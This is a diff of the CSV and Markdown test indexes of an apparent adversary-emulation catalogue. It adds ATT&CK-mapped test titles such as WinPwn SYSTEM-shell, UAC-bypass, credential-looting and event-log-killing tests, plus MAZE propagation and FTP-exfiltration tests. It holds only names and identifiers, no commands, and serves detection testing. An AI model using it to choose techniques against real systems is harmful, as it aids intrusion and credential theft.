 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -140,14 +166,18 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
+privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
+privilege-escalation,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
@@ -217,6 +247,10 @@ defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,
 defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
+defense-evasion,T1548.002,Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
+defense-evasion,T1548.002,Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
+defense-evasion,T1548.002,Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -238,6 +272,7 @@ defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and
 defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
+defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -276,7 +311,9 @@ defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender wi
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -309,6 +346,8 @@ defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/in
 defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
 defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
+defense-evasion,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
@@ -408,6 +447,7 @@ defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-8
 defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
 defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
+defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
 defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
@@ -452,6 +492,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -463,6 +505,8 @@ defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestam
 defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
+defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -513,6 +557,8 @@ persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657
 persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
 persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
+persistence,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
@@ -594,6 +640,7 @@ discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed
 discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1087.002,Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
 discovery,T1087.002,Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
+discovery,T1087.002,Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -619,6 +666,8 @@ discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (Pow
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
+discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
+discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
@@ -629,18 +678,26 @@ discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-
 discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
 discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
 discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
 discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
 discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
+discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
+discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
 discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
+discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
@@ -666,6 +723,9 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
 discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
@@ -673,6 +733,16 @@ discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cf
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
 discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
 discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
+discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
+discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
+discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
+discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
+discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
+discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
+discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
+discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
+discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
+discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
 discovery,T1614.001,System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
 discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
@@ -710,6 +780,8 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
 command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
+command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
@@ -743,7 +815,11 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
+execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
+execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
+execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
 execution,T1059.001,PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
@@ -799,6 +875,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
 exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
@@ -824,6 +901,8 @@ initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capabi
 initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
+initial-access,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -9,6 +9,7 @@
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
   - Atomic Test #2: Get-DomainUser with PowerView [windows]
+  - Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
@@ -30,12 +31,21 @@
   - Atomic Test #3: Extracting passwords with findstr [windows]
   - Atomic Test #4: Access unattend.xml [windows]
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
+  - Atomic Test #6: WinPwn - sensitivefiles [windows]
+  - Atomic Test #7: WinPwn - Snaffler [windows]
+  - Atomic Test #8: WinPwn - powershellsensitive [windows]
+  - Atomic Test #9: WinPwn - passhunt [windows]
+  - Atomic Test #10: WinPwn - SessionGopher [windows]
+  - Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
   - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
   - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
   - Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
